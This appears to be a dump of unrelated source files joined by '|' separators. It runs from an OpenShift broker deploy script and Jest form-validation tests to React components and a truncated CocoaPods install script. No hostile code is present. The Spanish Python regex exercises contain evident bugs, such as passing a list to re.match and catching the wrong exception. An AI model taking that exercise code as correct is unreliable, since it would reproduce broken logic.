ENABLE_BASIC_AUTH="false"
VARS="-p BROKER_CA_CERT=$(oc get secret -n kube-service-catalog -o go-template='{{ range .items }}{{ if eq .type "kubernetes.io/service-account-token" }}{{ index .data "service-ca.crt" }}{{end}}{{"\n"}}{{end}}' | tail -n 1)"
# Creating openssl certs to use.
mkdir -p /tmp/etcd-cert
openssl req -nodes -x509 -newkey rsa:4096 -keyout /tmp/etcd-cert/key.pem -out /tmp/etcd-cert/cert.pem -days 365 -subj "/CN=asb-etcd.ansible-service-broker.svc"
openssl genrsa -out /tmp/etcd-cert/MyClient1.key 2048 \
&& openssl req -new -key /tmp/etcd-cert/MyClient1.key -out /tmp/etcd-cert/MyClient1.csr -subj "/CN=client" \
&& openssl x509 -req -in /tmp/etcd-cert/MyClient1.csr -CA /tmp/etcd-cert/cert.pem -CAkey /tmp/etcd-cert/key.pem -CAcreateserial -out /tmp/etcd-cert/MyClient1.pem -days 1024
ETCD_CA_CERT=$(cat /tmp/etcd-cert/cert.pem | base64)
BROKER_CLIENT_CERT=$(cat /tmp/etcd-cert/MyClient1.pem | base64)
BROKER_CLIENT_KEY=$(cat /tmp/etcd-cert/MyClient1.key | base64)
curl -s $TEMPLATE_URL \
| oc process \
-n ansible-service-broker \
-p DOCKERHUB_ORG="$DOCKERHUB_ORG" \
-p ENABLE_BASIC_AUTH="$ENABLE_BASIC_AUTH" \
-p ETCD_TRUSTED_CA_FILE=/var/run/etcd-auth-secret/ca.crt \
-p BROKER_CLIENT_CERT_PATH=/var/run/asb-etcd-auth/client.crt \
-p BROKER_CLIENT_KEY_PATH=/var/run/asb-etcd-auth/client.key \
-p ETCD_TRUSTED_CA="$ETCD_CA_CERT" \
-p BROKER_CLIENT_CERT="$BROKER_CLIENT_CERT" \
-p BROKER_CLIENT_KEY="$BROKER_CLIENT_KEY" \
-p NAMESPACE=ansible-service-broker \
$VARS -f - | oc create -f -
if [ "$?" -ne 0 ]; then
echo "Error processing template and creating deployment"
exit
fi
#
# Then login as 'developer'/'developer' to WebUI
# Create a project
# Deploy mediawiki to new project (use a password other than
# admin since mediawiki forbids admin as password)
# Deploy PostgreSQL(ABP) to new project
# After they are up
# Click 'Create Binding' on the kebab menu for Mediawiki,
# select postgres
# Click deploy on mediawiki, after it's redeployed access webui
#
|
import {shouldLockSubmitBtnByControl} from '@control-handlers/submit-btn-lock-handler'
import {getInitFormDataSingleControl} from "@mock-functions/get-initialized-full-form";
import {ControlProps, CurrentControlData} from "@common-types";
describe('set-lock-submit-validator-result find, should lock submit btn', () => {
test('shouldLockSubmitBtn === false, if control valid', () => {
const currentControl:ControlProps = {
type: 'text',
value: 'abc'
},
{controlName, initFormData: form} = getInitFormDataSingleControl(currentControl),
currentControlData:CurrentControlData = {currentControl, controlName, formName: form.formSettings.formName, controlIndex: null, formIndex: null},
shouldLockSubmitBtn = shouldLockSubmitBtnByControl(currentControlData, form)
expect(shouldLockSubmitBtn).toBeFalsy()
})
test('shouldLockSubmitBtn === false, if control has error on rules, but in rule settings shouldLockSubmitBtnWhenControlInvalid !== true', () => {
const currentControl:ControlProps = {
type: 'text',
value: 'abc',
validateRules: {
maxLength: {
limit: 2,
message: 'longer than limit'
}
}
},
{controlName, initFormData: form} = getInitFormDataSingleControl(currentControl),
currentControlData:CurrentControlData = {currentControl, controlName, formName: form.formSettings.formName, controlIndex: null, formIndex: null},
shouldLockSubmitBtn = shouldLockSubmitBtnByControl(currentControlData, form)
expect(shouldLockSubmitBtn).toBeFalsy()
})
test('shouldLockSubmitBtn === true, if control has error on rules, and in rule settings shouldLockSubmitBtnWhenControlInvalid === true', () => {
const validatorName = 'maxLength',
currentControl:ControlProps = {
type: 'text',
value: 'abc',
validateRules: {
[validatorName]: {
limit: 2,
message: 'longer than limit'
},
},
validatorsSetting: {
[validatorName]: {
shouldLockSubmitBtnWhenControlInvalid: true
}
}
},
{controlName, initFormData: form} = getInitFormDataSingleControl(currentControl),
currentControlData:CurrentControlData = {currentControl, controlName, formName: form.formSettings.formName, controlIndex: null, formIndex: null},
shouldLockSubmitBtn = shouldLockSubmitBtnByControl(currentControlData, form)
expect(shouldLockSubmitBtn).toBeTruthy()
})
test('shouldLockSubmitBtn === true, if control rules valid, but additional submit btn validator return true', () => {
const validatorName = 'maxLength',
currentControl:ControlProps = {
type: 'text',
value: 'ab',
validateRules: {
[validatorName]: {
limit: 2,
message: 'longer than limit'
},
},
validatorsSetting: {
[validatorName]: {
shouldLockSubmitBtnWhenControlInvalid: true
}
},
additionalLockSubmitBtnValidator: (hooksData) => {
return {hasError: true}
}
},
{controlName, initFormData: form} = getInitFormDataSingleControl(currentControl),
currentControlData:CurrentControlData = {currentControl, controlName, formName: form.formSettings.formName, controlIndex: null, formIndex: null},
shouldLockSubmitBtn = shouldLockSubmitBtnByControl(currentControlData, form)
expect(shouldLockSubmitBtn).toBeTruthy()
})
test('shouldLockSubmitBtn === true, if control rules lock submit btn, but additional submit btn validator return false', () => {
const validatorName = 'maxLength',
currentControl:ControlProps = {
type: 'text',
value: 'abc',
validateRules: {
[validatorName]: {
limit: 2,
message: 'longer than limit'
},
},
validatorsSetting: {
[validatorName]: {
shouldLockSubmitBtnWhenControlInvalid: true
}
},
additionalLockSubmitBtnValidator: (hooksData) => {
return {hasError: false}
}
},
{controlName, initFormData: form} = getInitFormDataSingleControl(currentControl),
currentControlData:CurrentControlData = {currentControl, controlName, formName: form.formSettings.formName, controlIndex: null, formIndex: null},
shouldLockSubmitBtn = shouldLockSubmitBtnByControl(currentControlData, form)
expect(shouldLockSubmitBtn).toBeTruthy()
})
}) |
#!/usr/bin/env bash
python -m batch_runner.plot_batch \
--root_dir ~/tlio_data/CoyoteDataset \
--data_list ~/tlio_data/CoyoteDataset/test.txt \
--runname_globbing "*" \
--filter_dir ../../../tlio_data/CoyoteDataset \
--ronin_dir ../../../tlio_data/CoyoteDataset \ |
import nibabel as nib
import numpy as np
def process_and_save_nifti_image(img, new_file_name):
# Extract the image data from the input NIfTI image
img_data = np.squeeze(img.dataobj)
affine_matrix = img.affine
# Create a new NIfTI image using the extracted data and the affine transformation matrix
new_nifti_img = nib.Nifti1Image(img_data, affine_matrix)
# Save the new NIfTI image with the specified new_file_name in the current working directory
nib.save(new_nifti_img, new_file_name) |
class ProjectCreationRequest {
constructor(projectName, requester, creationDate) {
this.projectName = projectName;
this.requester = requester;
this.creationDate = creationDate;
this.status = "pending";
}
approveRequest() {
this.status = "approved";
}
rejectRequest() {
this.status = "rejected";
}
getStatus() {
return this.status;
}
}
export default ProjectCreationRequest; |
import { renderFile } from 'ejs';
import { promises as fs } from 'fs';
import { resolve } from 'path';
import { Schema, SchemaValue, SchemaValueProperties } from './builder';
import logger from './logger';
export enum FORMAT_TYPE {
FLOW = 'flow',
TS = 'ts'
}
interface AccumulatedExtras {
exportTypes: Array<{ name: string; type: string }>;
importTypes: Array<string>;
}
const getAccumulatedExtras = (
properties: SchemaValueProperties
): AccumulatedExtras =>
Object.entries(properties).reduce(
(acc, currentValue) => {
const { exportTypes: accExports, importTypes: accImports } = acc;
const [name, value] = currentValue;
const { exportTypes: newExport, importTypes: newImport } = value;
return {
exportTypes: newExport
? [...accExports, { name: name[0].toUpperCase() + name.slice(1), type: newExport }]
: accExports,
importTypes:
newImport && !accImports.includes(newImport)
? [...accImports, newImport]
: accImports
};
},
{ exportTypes: [], importTypes: [] } as AccumulatedExtras
);
export async function generateFile(
format: FORMAT_TYPE,
output: string,
schema: Schema
): Promise<void> {
const requests = schema.map((descriptor: SchemaValue): Promise<void> | void => {
if (!(descriptor instanceof Object)) return;
const { name, properties } = descriptor;
const templateFile = format === FORMAT_TYPE.TS ? 'typescript' : 'flow';
return new Promise((promiseResolve, promiseReject): void => {
renderFile(
resolve(__dirname, `templates/${templateFile}.ejs`),
{ name, properties, ...getAccumulatedExtras(properties) },
async (err, result): Promise<void> => {
if (err) {
logger(err);
}
try {
await fs.writeFile(
`${output}/${name}.${format === FORMAT_TYPE.TS ? 'd.ts' : 'js.flow'}`,
result
);
} catch (error) {
promiseReject(error);
return;
}
promiseResolve();
}
);
});
});
await Promise.all(requests);
}
|
require('habitat').load();
require('newrelic');
var Hoek = require('hoek');
var options = {
host: process.env.HOST,
port: process.env.PORT,
loginAPI: process.env.LOGINAPI,
oauth_clients: process.env.OAUTH_DB ? JSON.parse(process.env.OAUTH_DB) : [],
authCodes: process.env.AUTH_CODES ? JSON.parse(process.env.AUTH_CODES) : {},
accessTokens: process.env.ACCESS_TOKENS ? JSON.parse(process.env.ACCESS_TOKENS) : [],
cookieSecret: process.env.COOKIE_SECRET,
secureCookies: process.env.SECURE_COOKIES === 'true',
uri: process.env.URI,
enableCSRF: process.env.ENABLE_CSRF !== 'false',
logging: process.env.LOGGING === 'true',
logLevel: process.env.LOG_LEVEL ? process.env.LOG_LEVEL : 'info',
redisUrl: process.env.REDIS_URL
};
var server = require('./server')(options);
server.start(function(error) {
Hoek.assert(!error, error);
console.log('Server running at: %s', server.info.uri);
});
|
def factorial(num):
product = 1
for i in range(1,num+1):
product *= i
return product |
<filename>PC4problemasdiversos-problema2.py<gh_stars>0
#1
n = int(input('Introduce un numero entero entre el 1 y el 10: '))
file_name = 'tabla-' + str(n) + '.txt'
f = open(file_name, 'w')
for i in range(1,11):
f.write(str(n) + 'x' + str(i) + ' = ' + str(n * i) + '\n')
f.close()
#2
n = int(input('Introduce un numero entero entero entre el 1 y el 10: '))
file_name = 'tabla-' + str(n) + '.txt'
try:
f = open(file_name, 'r')
except FileNotFoundError:
print('No existe el fichero con la tabla del', n)
else:
print(f.read())
f.close()
#3
n = int(input('Introduce un numero entero entre el 1 y el 10: '))
m = int(input('Introduce otro numero entero entre 1 y 10: '))
file_name = 'tabla-' + str(n) + '.txt'
try:
f = open(file_name, 'r')
except FileExistsError:
print('No existe el fichero con la tabla del ', n)
else:
lines = f.readlines()
print(lines[m - 1])
#4
import re
patron = input("escriba su patron: ")
print(re.match(r'@robot', patron))
#5
tweet = "Unfortunately one of those moments wasn't a giant squid monster. \n User_mentions:2 \n likes: 9 \n number of retweets: 7"
print(re.findall(r'\d', tweet))
#6
archivo = input("introduzca su nombre de archivo ")
file_name = str(archivo) + '.txt'
f = open(file_name, 'w')
for linea in file_name:
linea= linea.rstrip()
if re.search(r'/[aeiou]/',linea):
print(linea)
#7
def es_correo_valido(correo):
expresion_regular = r"(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|\"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9]))\.){3}(?:(2(5[0-5]|[0-4][0-9])|1[0-9][0-9]|[1-9]?[0-9])|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])"
return re.match(expresion_regular, correo) is not None
emails = ['<EMAIL>', '<EMAIL>', '!#mary-=@<EMAIL>']
for example in emails:
if re.match(emails, example):
print("The email {email_example} is a valid email".format(email_example=example))
else:
print("The email {email_example} is invalid".format(email_example=example))
#8
regex = r"[0-9]{16}|(([0-9]{4}\s){3}[0-9]{4})|(-([0-9]{4}\s){3}[0-9]{4})(.)\1{4}"
tarjetas=['4123456789123456','5123-4567-8912-3456','61234-567-8912-3456','4123356789123456','5133-3367-8912-3456','5123 - 3567 - 8912 - 3456']
for example in tarjetas:
if re.match(regex, example):
print("valid".format(tarjeta_example=example))
else:
print("invalid".format(tarjeta_example=example))
|
<reponame>stevengreens10/x86Disassembler
#include <iostream>
#include "InstructionStream.h"
#include "Disassembler.h"
Instruction InstructionStream::next() {
auto stream = m_stream + m_numBytesConsumed;
uint8_t opcode = stream[0];
uint8_t modrm = stream[1];
int numBytesConsumed = 1;
Instruction ins{};
ins.opcode = opcode;
ins.mod = mod(modrm);
ins.reg = reg(modrm);
ins.rm = rm(modrm);
ins.mode = Disassembler::modeTable[ins.mod];
if (opcode == 0x31) {
ins.mnemonic = InstructionMnemonic::XOR;
ins.instructionType = InstructionType::REG_REG;
ins.regSrc = Disassembler::reg32Table.find(ins.reg)->second;
ins.regDst = Disassembler::reg32Table.find(ins.rm)->second;
numBytesConsumed = 2;
} else {
std::cerr << "Could not parse instruction with opcode 0x" << std::hex << (int) opcode << std::endl;
exit(1);
}
m_numBytesConsumed += numBytesConsumed;
return ins;
}
bool InstructionStream::finished() {
return m_numBytesConsumed >= m_size;
}
|
<reponame>tm3cheun/tm3cheun
'use strict';
// Declare app level module which depends on views, and components
var app = angular.module('myApp', [
'ngRoute',
'myApp.home',
'myApp.photography',
'myApp.gallery',
'myApp.project',
'myApp.projects',
'myApp.version'
]);
app.config(['$locationProvider', '$routeProvider', function($locationProvider, $routeProvider) {
$locationProvider.hashPrefix('');
$routeProvider
.when('/', {
templateUrl : 'home/home.html',
controller : 'HomeCtrl'
})
.when('/photography', {
templateUrl: 'photography/photography.html',
controller: 'photographyCtrl'
})
.when('/photography/:galleryId', {
templateUrl: 'photography/gallery.html',
controller: 'galleryCtrl'
})
.when('/projects', {
templateUrl: 'projects/projects.html',
controller: 'projectsCtrl'
})
.when('/projects/:projectId', {
templateUrl: 'projects/project.html',
controller: 'projectCtrl'
})
.otherwise({
redirectTo: '/'
});
$locationProvider.html5Mode({
enabled: true,
requireBase: false
});
}]);
app.run(['$anchorScroll', function($anchorScroll) {
$anchorScroll.yOffset = 50;
}]); |
#! /bin/bash
set -e #abort on first command returning a failure
source_net=10.0.0.0/24
source_bridge=bridge43
dest_net=10.42.42.0/24
dest_bridge=bridge44
dest_gateway=10.42.42.2
if1=tap0
if2=tap1
export NSNAME="server1"
shopt -s expand_aliases
alias server1="sudo ip netns exec $NSNAME"
setup() {
# Create veth link
sudo ip link add veth_src type veth peer name veth_dest
# Bring up source end
sudo ip link set veth_src up
# Add network namespace
sudo ip netns add $NSNAME
# Add destination to namespace
sudo ip link set veth_dest netns $NSNAME
# Bring up destination end, with IP, inside namespace
server1 ip addr add $dest_gateway/24 dev veth_dest
server1 ip link set veth_dest up
server1 ip link set lo up
# Create a second bridge and bring it up, no IP
sudo ip link add name $dest_bridge type bridge
sudo ip link set dev $dest_bridge up
# Add source end to bridge44
sudo ip link set dev veth_src master $dest_bridge
# Route all traffic to the isolated network via bridge43
sudo ip route add $dest_net dev $source_bridge
# Route all traffic from server1 back to root namespace, via veth_dest
server1 sudo ip route add $source_net via $dest_gateway
echo ">>> Setup complete"
}
undo(){
# Always run all cleanup commands even if one fails
set +e
echo ">>> Deleting veth_src"
sudo ip link delete veth_src
echo ">>> Deleting $dest_bridge"
sudo ip link set $dest_bridge down
sudo ip link del $dest_bridge
echo ">>> Deleting namespace and veth pair"
sudo ip netns del $NSNAME
echo ">>> Deleting route to namespace"
sudo ip route del $dest_net dev $source_bridge
}
vmsetup(){
echo ">>> Moving VM iface $if2 to $dest_bridge"
sudo ip link set dev $if2 nomaster
sudo ip link set dev $if2 master $dest_bridge
sudo ip link set $if2 up
echo ">>> Done."
}
if [ "$1" == "--clean" ]
then
undo
elif [ "$1" == "--vmsetup" ]
then
vmsetup
else
setup
fi
|
import React, { Component } from 'react';
import PropTypes from 'prop-types';
import { Field, change, touch, formValueSelector } from 'redux-form';
import { connect } from 'react-redux';
import { toDatePrettyPrint } from '@navikt/digisyfo-npm';
import cn from 'classnames';
import MaskedInput from 'react-maskedinput';
import Feilmelding from '../Feilmelding';
import DayPickerComponent from './DayPickerDato';
import validerDatoField from './validerDatoField';
import { fieldPropTypes } from '../../../propTypes';
export class DatoField extends Component {
constructor(props) {
super(props);
this.state = {
erApen: false,
};
}
componentDidUpdate(prevProps) {
const currentValue = this.props.input.value;
const forrigeValue = prevProps.input.value;
if (currentValue !== forrigeValue && this.props.oppdaterSporsmal) {
this.props.oppdaterSporsmal(null, this.props.inputValue);
}
}
onKeyUp(e) {
const ESCAPE_KEYCODE = 27;
if (e.which === ESCAPE_KEYCODE) {
this.lukk();
}
}
toggleApen() {
if (this.state.erApen) {
this.lukk();
} else {
this.apne();
}
}
apne() {
this.setState({
erApen: true,
});
}
lukk() {
this.setState({
erApen: false,
});
if (this.toggle) {
this.toggle.focus();
}
}
parseVerdi(jsDato) {
const verdi = toDatePrettyPrint(new Date(jsDato));
return !this.props.parseVerdi
? verdi
: this.props.parseVerdi(verdi);
}
render() {
const { meta, input, id, tidligsteFom, senesteTom } = this.props;
const classNameMaskedInput = cn('skjemaelement__input datovelger__input', {
'skjemaelement__input--harFeil': meta.touched && meta.error,
});
/* eslint-disable jsx-a11y/no-static-element-interactions */
return (<div className="datovelger">
<div
className="datovelger__inner"
onClick={(event) => {
try {
event.nativeEvent.stopImmediatePropagation();
} catch (e) {
event.stopPropagation();
}
}}>
<div className="datovelger__inputContainer">
<MaskedInput
type="tel"
mask="11.11.1111"
autoComplete="off"
placeholder="dd.mm.åååå"
id={id}
onKeyUp={() => {
this.setState({
erApen: false,
});
}}
className={classNameMaskedInput}
{...input} />
<button
type="button"
className="js-toggle datovelger__toggleDayPicker"
ref={(c) => {
this.toggle = c;
}}
id={`toggle-${id}`}
onKeyUp={(e) => {
this.onKeyUp(e);
}}
onClick={(e) => {
e.preventDefault();
this.toggleApen();
}}
aria-pressed={this.state.erApen}>
{this.state.erApen ? 'Skjul datovelger' : 'Vis datovelger'}
</button>
</div>
{
this.state.erApen
&& <DayPickerComponent
{...this.props}
erApen={this.state.erApen}
tidligsteFom={tidligsteFom}
senesteTom={senesteTom}
onDayClick={(event, jsDato) => {
const verdi = this.parseVerdi(jsDato);
this.props.change(meta.form, this.props.input.name, verdi);
this.props.touch(meta.form, this.props.input.name);
this.lukk();
}}
onKeyUp={(e) => {
this.onKeyUp(e);
}}
lukk={() => {
this.lukk();
}} />
}
<Feilmelding {...meta} />
</div>
</div>);
/* eslint-enable jsx-a11y/no-static-element-interactions */
}
}
DatoField.propTypes = {
meta: fieldPropTypes.meta,
id: PropTypes.string.isRequired,
input: fieldPropTypes.input,
touch: PropTypes.func.isRequired,
change: PropTypes.func.isRequired,
oppdaterSporsmal: PropTypes.func,
parseVerdi: PropTypes.func,
tidligsteFom: PropTypes.instanceOf(Date),
senesteTom: PropTypes.instanceOf(Date),
inputValue: PropTypes.oneOfType([PropTypes.shape(), PropTypes.string]),
};
const mapStateToProps = (state, ownProps) => {
const inputName = ownProps.input.name;
const skjemanavn = ownProps.meta.form;
const selector = formValueSelector(skjemanavn);
const inputValue = selector(state, inputName);
return {
inputValue,
};
};
const ConnectedDatoField = connect(mapStateToProps, { change, touch })(DatoField);
export const genererValidate = (props) => {
return (verdi) => {
const formatertVerdi = props.format
? props.format(verdi)
: verdi;
return validerDatoField(formatertVerdi, {
fra: props.tidligsteFom,
til: props.senesteTom,
});
};
};
const Datovelger = (props) => {
const validate = genererValidate(props);
return (<Field
component={ConnectedDatoField}
validate={validate}
{...props} />);
};
Datovelger.propTypes = {
tidligsteFom: PropTypes.instanceOf(Date),
senesteTom: PropTypes.instanceOf(Date),
validate: PropTypes.func,
};
export default Datovelger;
|
<filename>src/components/Search/index.tsx
import { useState } from "react";
import { useSearch} from "../../hooks/useSearch"
import { SearchBar, SwitchButton, Container} from "./styles";
export function Search() {
const search = useSearch();
const [content, setContent] = useState("");
return(
//entender a propriedade Key neste caso
<Container>
<SwitchButton className={search.usersIsSelected} type="button"
onClick={() => {search.handleUserButtomIsSelected(search.usersIsSelected)} }>Users</SwitchButton>
<SwitchButton className={search.repositoriesIsSelected} type="button"
onClick={() => {search.handleRepositoriesButtomIsSelected(search.repositoriesIsSelected)}}>Repositories</SwitchButton>
<SearchBar key={search.argument}>
<input value={content} onChange={event => setContent(event.target.value)} type="text" placeholder="Digite aqui." />
<button type="button" onClick={() => search.handleNewArgument(content)}>Pesquisar</button>
</SearchBar>
</Container>
)
} |
/* GENERATED FILE */
import { html, svg, define } from "hybrids";
const PhDiceTwo = {
color: "currentColor",
size: "1em",
weight: "regular",
mirrored: false,
render: ({ color, size, weight, mirrored }) => html`
<svg
xmlns="http://www.w3.org/2000/svg"
width="${size}"
height="${size}"
fill="${color}"
viewBox="0 0 256 256"
transform=${mirrored ? "scale(-1, 1)" : null}
>
${weight === "bold" &&
svg`<rect x="40" y="40" width="176" height="176" rx="24" stroke-width="24" stroke="${color}" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
<circle cx="104" cy="104" r="16"/>
<circle cx="152" cy="152" r="16"/>`}
${weight === "duotone" &&
svg`<rect x="40" y="40" width="176" height="176" rx="24" opacity="0.2"/>
<rect x="40" y="40" width="176" height="176" rx="24" stroke-width="16" stroke="${color}" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
<circle cx="108" cy="108" r="12"/>
<circle cx="148" cy="148" r="12"/>`}
${weight === "fill" &&
svg`<path d="M192,32H64A32.03667,32.03667,0,0,0,32,64V192a32.03667,32.03667,0,0,0,32,32H192a32.03667,32.03667,0,0,0,32-32V64A32.03667,32.03667,0,0,0,192,32Zm-84,88a12,12,0,1,1,12-12A12,12,0,0,1,108,120Zm40,40a12,12,0,1,1,12-12A12,12,0,0,1,148,160Z"/>`}
${weight === "light" &&
svg`<rect x="40" y="40" width="176" height="176" rx="24" stroke-width="12" stroke="${color}" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
<circle cx="108" cy="108" r="10"/>
<circle cx="148" cy="148" r="10"/>`}
${weight === "thin" &&
svg`<rect x="40" y="40" width="176" height="176" rx="24" stroke-width="8" stroke="${color}" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
<circle cx="108" cy="108" r="8"/>
<circle cx="148" cy="148" r="8"/>`}
${weight === "regular" &&
svg`<rect x="40" y="40" width="176" height="176" rx="24" stroke-width="16" stroke="${color}" stroke-linecap="round" stroke-linejoin="round" fill="none"/>
<circle cx="108" cy="108" r="12"/>
<circle cx="148" cy="148" r="12"/>`}
</svg>
`,
};
define("ph-dice-two", PhDiceTwo);
export default PhDiceTwo;
|
#!/bin/sh
set -e
set -u
set -o pipefail
function on_error {
echo "$(realpath -mq "${0}"):$1: error: Unexpected failure"
}
trap 'on_error $LINENO' ERR
if [ -z ${FRAMEWORKS_FOLDER_PATH+x} ]; then
# If FRAMEWORKS_FOLDER_PATH is not set, then there's nowhere for us to copy
# frameworks to, so exit 0 (signalling the script phase was successful).
exit 0
fi
echo "mkdir -p ${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
mkdir -p "${CONFIGURATION_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
COCOAPODS_PARALLEL_CODE_SIGN="${COCOAPODS_PARALLEL_CODE_SIGN:-false}"
SWIFT_STDLIB_PATH="${DT_TOOLCHAIN_DIR}/usr/lib/swift/${PLATFORM_NAME}"
# Used as a return value for each invocation of `strip_invalid_archs` function.
STRIP_BINARY_RETVAL=0
# This protects against multiple targets copying the same framework dependency at the same time. The solution
# was originally proposed here: https://lists.samba.org/archive/rsync/2008-February/020158.html
RSYNC_PROTECT_TMP_FILES=(--filter "P .*.??????")
# Copies and strips a vendored framework
install_framework()
{
if [ -r "${BUILT_PRODUCTS_DIR}/$1" ]; then
local source="${BUILT_PRODUCTS_DIR}/$1"
elif [ -r "${BUILT_PRODUCTS_DIR}/$(basename "$1")" ]; then
local source="${BUILT_PRODUCTS_DIR}/$(basename "$1")"
elif [ -r "$1" ]; then
local source="$1"
fi
local destination="${TARGET_BUILD_DIR}/${FRAMEWORKS_FOLDER_PATH}"
if [ -L "${source}" ]; then
echo "Symlinked..."
source="$(readlink "${source}")"
fi
# Use filter instead of exclude so missing patterns don't throw errors.
echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${destination}\""
rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${destination}"
local basename
basename="$(basename -s .framework "$1")"
binary="${destination}/${basename}.framework/${basename}"
if ! [ -r "$binary" ]; then
binary="${destination}/${basename}"
elif [ -L "${binary}" ]; then
echo "Destination binary is symlinked..."
dirname="$(dirname "${binary}")"
binary="${dirname}/$(readlink "${binary}")"
fi
# Strip invalid architectures so "fat" simulator / device frameworks work on device
if [[ "$(file "$binary")" == *"dynamically linked shared library"* ]]; then
strip_invalid_archs "$binary"
fi
# Resign the code if required by the build settings to avoid unstable apps
code_sign_if_enabled "${destination}/$(basename "$1")"
# Embed linked Swift runtime libraries. No longer necessary as of Xcode 7.
if [ "${XCODE_VERSION_MAJOR}" -lt 7 ]; then
local swift_runtime_libs
swift_runtime_libs=$(xcrun otool -LX "$binary" | grep --color=never @rpath/libswift | sed -E s/@rpath\\/\(.+dylib\).*/\\1/g | uniq -u)
for lib in $swift_runtime_libs; do
echo "rsync -auv \"${SWIFT_STDLIB_PATH}/${lib}\" \"${destination}\""
rsync -auv "${SWIFT_STDLIB_PATH}/${lib}" "${destination}"
code_sign_if_enabled "${destination}/${lib}"
done
fi
}
# Copies and strips a vendored dSYM
install_dsym() {
local source="$1"
if [ -r "$source" ]; then
# Copy the dSYM into a the targets temp dir.
echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${source}\" \"${DERIVED_FILES_DIR}\""
rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${source}" "${DERIVED_FILES_DIR}"
local basename
basename="$(basename -s .framework.dSYM "$source")"
binary="${DERIVED_FILES_DIR}/${basename}.framework.dSYM/Contents/Resources/DWARF/${basename}"
# Strip invalid architectures so "fat" simulator / device frameworks work on device
if [[ "$(file "$binary")" == *"Mach-O dSYM companion"* ]]; then
strip_invalid_archs "$binary"
fi
if [[ $STRIP_BINARY_RETVAL == 1 ]]; then
# Move the stripped file into its final destination.
echo "rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter \"- CVS/\" --filter \"- .svn/\" --filter \"- .git/\" --filter \"- .hg/\" --filter \"- Headers\" --filter \"- PrivateHeaders\" --filter \"- Modules\" \"${DERIVED_FILES_DIR}/${basename}.framework.dSYM\" \"${DWARF_DSYM_FOLDER_PATH}\""
rsync --delete -av "${RSYNC_PROTECT_TMP_FILES[@]}" --filter "- CVS/" --filter "- .svn/" --filter "- .git/" --filter "- .hg/" --filter "- Headers" --filter "- PrivateHeaders" --filter "- Modules" "${DERIVED_FILES_DIR}/${basename}.framework.dSYM" "${DWARF_DSYM_FOLDER_PATH}"
else
# The dSYM was not stripped at all, in this case touch a fake folder so the input/output paths from Xcode do not reexecute this script because the file is missing.
touch "${DWARF_DSYM_FOLDER_PATH}/${basename}.framework.dSYM"
fi
fi
}
# Signs a framework with the provided identity
code_sign_if_enabled() {
if [ -n "${EXPANDED_CODE_SIGN_IDENTITY:-}" -a "${CODE_SIGNING_REQUIRED:-}" != "NO" -a "${CODE_SIGNING_ALLOWED}" != "NO" ]; then
# Use the current code_sign_identity
echo "Code Signing $1 with Identity ${EXPANDED_CODE_SIGN_IDENTITY_NAME}"
local code_sign_cmd="/usr/bin/codesign --force --sign ${EXPANDED_CODE_SIGN_IDENTITY} ${OTHER_CODE_SIGN_FLAGS:-} --preserve-metadata=identifier,entitlements '$1'"
if [ "${COCOAPODS_PARALLEL_CODE_SIGN}" == "true" ]; then
code_sign_cmd="$code_sign_cmd &"
fi
echo "$code_sign_cmd"
eval "$code_sign_cmd"
fi
}
# Strip invalid architectures
strip_invalid_archs() {
binary="$1"
# Get architectures for current target binary
binary_archs="$(lipo -info "$binary" | rev | cut -d ':' -f1 | awk '{$1=$1;print}' | rev)"
# Intersect them with the architectures we are building for
intersected_archs="$(echo ${ARCHS[@]} ${binary_archs[@]} | tr ' ' '\n' | sort | uniq -d)"
# If there are no archs supported by this binary then warn the user
if [[ -z "$intersected_archs" ]]; then
echo "warning: [CP] Vendored binary '$binary' contains architectures ($binary_archs) none of which match the current build architectures ($ARCHS)."
STRIP_BINARY_RETVAL=0
return
fi
stripped=""
for arch in $binary_archs; do
if ! [[ "${ARCHS}" == *"$arch"* ]]; then
# Strip non-valid architectures in-place
lipo -remove "$arch" -output "$binary" "$binary"
stripped="$stripped $arch"
fi
done
if [[ "$stripped" ]]; then
echo "Stripped $binary of architectures:$stripped"
fi
STRIP_BINARY_RETVAL=1
}
if [[ "$CONFIGURATION" == "Debug" ]]; then
install_framework "${BUILT_PRODUCTS_DIR}/Alamofire/Alamofire.framework"
install_framework "${BUILT_PRODUCTS_DIR}/AlamofireObjectMapper/AlamofireObjectMapper.framework"
install_framework "${BUILT_PRODUCTS_DIR}/Kingfisher/Kingfisher.framework"
install_framework "${BUILT_PRODUCTS_DIR}/ObjectMapper/ObjectMapper.framework"
fi
if [[ "$CONFIGURATION" == "Release" ]]; then
install_framework "${BUILT_PRODUCTS_DIR}/Alamofire/Alamofire.framework"
